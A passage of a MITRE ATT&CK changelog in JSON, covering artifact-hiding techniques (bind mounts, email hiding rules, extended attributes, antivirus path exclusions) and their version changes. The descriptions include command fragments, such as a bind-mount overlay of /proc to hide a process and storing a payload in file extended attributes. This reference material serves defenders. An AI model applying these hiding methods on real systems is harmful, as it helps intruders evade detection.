                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Office Suite",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:17:25.231000+00:00\", \"old_value\": \"2025-10-24 17:48:31.407000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1013: Application Developer Guidance",
                            "M1033: Limit Software Installation",
                            "M1047: Audit",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0502: Detection Strategy for Hidden Artifacts Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--5bd41255-a224-4425-a2e2-e9d293eafe1c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-01-30 21:01:16.340000+00:00",
                    "modified": "2026-04-15 20:17:48.263000+00:00",
                    "name": "Bind Mounts",
                    "description": "Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file from one location on the filesystem to another, similar to a shortcut on Windows. It\u2019s commonly used to provide access to specific files or directories across different environments, such as inside containers or chroot environments, and requires sudo access. \n\nAdversaries may use bind mounts to map either an empty directory or a benign `/proc` directory to a malicious process\u2019s `/proc` directory. Using the commands `mount \u2013o bind /proc/benign-process /proc/malicious-process` (or `mount \u2013B`), the malicious process's `/proc` directory is overlayed with the contents of a benign process's `/proc` directory. When system utilities query process activity, such as `ps` and `top`, the kernel follows the bind mount and presents the benign directory\u2019s contents instead of the malicious process's actual `/proc` directory. As a result, these utilities display information that appears to come from the benign process, effectively hiding the malicious process's metadata, executable, or other artifacts from detection.(Citation: Cado Security Commando Cat 2024)(Citation: Ahn Lab CoinMiner 2023)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/013",
                            "external_id": "T1564.013"
                        },
                        {
                            "source_name": "Ahn Lab CoinMiner 2023",
                            "description": "Ahn Lab. (2023, April 24). CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers. Retrieved April 4, 2025.",
                            "url": "https://asec.ahnlab.com/en/51908/"
                        },
                        {
                            "source_name": "Cado Security Commando Cat 2024",
                            "description": "Nate Bill & Matt Muir. (2024, February 1). The Nine Lives of Commando Cat: Analysing a Novel Malware Campaign Targeting Docker. Retrieved April 4, 2025.",
                            "url": "https://www.cadosecurity.com/blog/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "L\u00ea Ph\u01b0\u01a1ng Nam, Group-IB"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:17:48.263000+00:00\", \"old_value\": \"2025-04-15 19:58:34.469000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0428: Detection Strategy for Bind Mounts on Linux"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-06-07 13:20:23.767000+00:00",
                    "modified": "2026-04-15 20:18:10.251000+00:00",
                    "name": "Email Hiding Rules",
                    "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as <code>malware</code>, <code>suspicious</code>, <code>phish</code>, and <code>hack</code>) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)\n\nIn some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/008",
                            "external_id": "T1564.008"
                        },
                        {
                            "source_name": "MacOS Email Rules",
                            "description": "Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.",
                            "url": "https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac"
                        },
                        {
                            "source_name": "Microsoft Mail Flow Rules 2023",
                            "description": "Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.",
                            "url": "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules"
                        },
                        {
                            "source_name": "Microsoft Inbox Rules",
                            "description": "Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.",
                            "url": "https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59"
                        },
                        {
                            "source_name": "Microsoft New-InboxRule",
                            "description": "Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.",
                            "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps"
                        },
                        {
                            "source_name": "Microsoft Set-InboxRule",
                            "description": "Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.",
                            "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps"
                        },
                        {
                            "source_name": "Microsoft Cloud App Security",
                            "description": "Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.",
                            "url": "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dor Edry, Microsoft",
                        "Liran Ravich, CardinalOps"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows",
                        "Linux",
                        "macOS",
                        "Office Suite"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:18:10.251000+00:00\", \"old_value\": \"2025-10-24 17:48:23.364000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}, \"iterable_item_removed\": {\"root['external_references'][2]\": {\"source_name\": \"Microsoft BEC Campaign\", \"description\": \"Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.\", \"url\": \"https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0192: Detection Strategy for Email Hiding Rules"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--762e6f29-a62f-4d96-91ed-d0073181431f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-03-27 19:40:00.716000+00:00",
                    "modified": "2026-04-15 20:19:25.896000+00:00",
                    "name": "Extended Attributes",
                    "description": "Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like `Finder`,  `ls`, or `cat` and require utilities such as `xattr` (macOS) or `getfattr` (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as `user.` (user permissions), `trusted.` (root permissions), `security.`, and `system.`, each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with `com.apple.*` (e.g., `com.apple.quarantine`, `com.apple.metadata:_kMDItemUserTags`) and used by system features like Gatekeeper and Spotlight.(Citation: Establishing persistence using extended attributes on Linux)\n\nAn adversary may leverage xattrs by embedding a second-stage payload into the extended attribute of a legitimate file. On macOS, a payload can be embedded into a custom attribute using the `xattr` command. A separate loader can retrieve the attribute with `xattr -p`, decode the content, and execute it using a scripting interpreter. On Linux, an adversary may use `setfattr` to write a payload into the `user.` namespace of a legitimate file. A loader script can later extract the payload with `getfattr --only-values`, decode it, and execute it using bash or another interpreter. In both cases, because the primary file content remains unchanged, security tools and integrity checks that do not inspect extended attributes will observe the original file hash, allowing the malicious payload to evade detection.(Citation: Low GroupIB xattrs nov 2024)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/014",
                            "external_id": "T1564.014"
                        },
                        {
                            "source_name": "Establishing persistence using extended attributes on Linux",
                            "description": "Irem Kuyucu. (2024, August 6). Establishing persistence using extended  attributes on Linux. Retrieved March 27, 2025.",
                            "url": "https://kernal.eu/posts/linux-xattr-persistence/"
                        },
                        {
                            "source_name": "Low GroupIB xattrs nov 2024",
                            "description": "Sharmine Low. (2024, November 13). Stealthy Attributes of Lazarus APT Group: Evading Detection with Extended Attributes. Retrieved March 27, 2025.",
                            "url": "https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Sharmine Low, Group-IB",
                        "Rouven Bissinger (SySS GmbH)",
                        "RoseSecurity"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:19:25.896000+00:00\", \"old_value\": \"2025-09-17 17:58:26.729000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0406: Detection Strategy for Extended Attributes Abuse"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-03-29 16:59:10.374000+00:00",
                    "modified": "2026-04-16 19:21:42.768000+00:00",
                    "name": "File/Path Exclusions",
                    "description": "Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)\n\nAdversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than  tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/012",
                            "external_id": "T1564.012"
                        },
                        {
                            "source_name": "Microsoft File Folder Exclusions",
                            "description": "Microsoft. (2024, February 27). Contextual file and folder exclusions. Retrieved March 29, 2024.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 19:21:42.768000+00:00\", \"old_value\": \"2025-04-15 22:35:31.731000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)\\n\\nAdversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than  tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.\", \"old_value\": \"Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)\\n\\nAdversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than  tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)\\n \\n-Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than  tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.\\n+Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than  tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to17__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to17__0\"><a href=\"#difflib_chg_to17__top\">t</a></td><td class=\"diff_header\" id=\"from17_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;hide&nbsp;their&nbsp;file-based&nbsp;artifacts&nbsp;b</td><td class=\"diff_next\"><a href=\"#difflib_chg_to17__top\">t</a></td><td class=\"diff_header\" id=\"to17_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;hide&nbsp;their&nbsp;file-based&nbsp;artifacts&nbsp;b</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;writing&nbsp;them&nbsp;to&nbsp;specific&nbsp;folders&nbsp;or&nbsp;file&nbsp;names&nbsp;excluded&nbsp;fr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;writing&nbsp;them&nbsp;to&nbsp;specific&nbsp;folders&nbsp;or&nbsp;file&nbsp;names&nbsp;excluded&nbsp;fr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">om&nbsp;antivirus&nbsp;(AV)&nbsp;scanning&nbsp;and&nbsp;other&nbsp;defensive&nbsp;capabilities.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">om&nbsp;antivirus&nbsp;(AV)&nbsp;scanning&nbsp;and&nbsp;other&nbsp;defensive&nbsp;capabilities.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;AV&nbsp;and&nbsp;other&nbsp;file-based&nbsp;scanners&nbsp;often&nbsp;include&nbsp;exclusions&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;AV&nbsp;and&nbsp;other&nbsp;file-based&nbsp;scanners&nbsp;often&nbsp;include&nbsp;exclusions&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;optimize&nbsp;performance&nbsp;as&nbsp;well&nbsp;as&nbsp;ease&nbsp;installation&nbsp;and&nbsp;legi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;optimize&nbsp;performance&nbsp;as&nbsp;well&nbsp;as&nbsp;ease&nbsp;installation&nbsp;and&nbsp;legi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">timate&nbsp;use&nbsp;of&nbsp;applications.&nbsp;These&nbsp;exclusions&nbsp;may&nbsp;be&nbsp;contextu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">timate&nbsp;use&nbsp;of&nbsp;applications.&nbsp;These&nbsp;exclusions&nbsp;may&nbsp;be&nbsp;contextu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">al&nbsp;(e.g.,&nbsp;scans&nbsp;are&nbsp;only&nbsp;initiated&nbsp;in&nbsp;response&nbsp;to&nbsp;specific&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">al&nbsp;(e.g.,&nbsp;scans&nbsp;are&nbsp;only&nbsp;initiated&nbsp;in&nbsp;response&nbsp;to&nbsp;specific&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">riggering&nbsp;events/alerts),&nbsp;but&nbsp;are&nbsp;also&nbsp;often&nbsp;hardcoded&nbsp;strin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">riggering&nbsp;events/alerts),&nbsp;but&nbsp;are&nbsp;also&nbsp;often&nbsp;hardcoded&nbsp;strin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">gs&nbsp;referencing&nbsp;specific&nbsp;folders&nbsp;and/or&nbsp;files&nbsp;assumed&nbsp;to&nbsp;be&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">gs&nbsp;referencing&nbsp;specific&nbsp;folders&nbsp;and/or&nbsp;files&nbsp;assumed&nbsp;to&nbsp;be&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rusted&nbsp;and&nbsp;legitimate.(Citation:&nbsp;Microsoft&nbsp;File&nbsp;Folder&nbsp;Exclu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rusted&nbsp;and&nbsp;legitimate.(Citation:&nbsp;Microsoft&nbsp;File&nbsp;Folder&nbsp;Exclu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sions)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;abuse&nbsp;these&nbsp;exclusions&nbsp;to&nbsp;hide&nbsp;their</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sions)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;abuse&nbsp;these&nbsp;exclusions&nbsp;to&nbsp;hide&nbsp;their</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;file-based&nbsp;artifacts.&nbsp;For&nbsp;example,&nbsp;rather&nbsp;than&nbsp;&nbsp;tampering&nbsp;w</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;file-based&nbsp;artifacts.&nbsp;For&nbsp;example,&nbsp;rather&nbsp;than&nbsp;&nbsp;tampering&nbsp;w</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ith&nbsp;tool&nbsp;settings&nbsp;to&nbsp;add&nbsp;a&nbsp;new&nbsp;exclusion&nbsp;(i.e.,&nbsp;[Disable&nbsp;or&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ith&nbsp;tool&nbsp;settings&nbsp;to&nbsp;add&nbsp;a&nbsp;new&nbsp;exclusion&nbsp;(i.e.,&nbsp;[Disable&nbsp;or&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Modify&nbsp;Tools](https://attack.mitre.org/techniques/T15<span class=\"diff_sub\">62/001</span>)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Modify&nbsp;Tools](https://attack.mitre.org/techniques/T1<span class=\"diff_add\">68</span>5)),&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">),&nbsp;adversaries&nbsp;may&nbsp;drop&nbsp;their&nbsp;file-based&nbsp;payloads&nbsp;in&nbsp;default</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dversaries&nbsp;may&nbsp;drop&nbsp;their&nbsp;file-based&nbsp;payloads&nbsp;in&nbsp;default&nbsp;or&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;or&nbsp;otherwise&nbsp;well-known&nbsp;exclusions.&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;us</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">otherwise&nbsp;well-known&nbsp;exclusions.&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;use&nbsp;[S</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 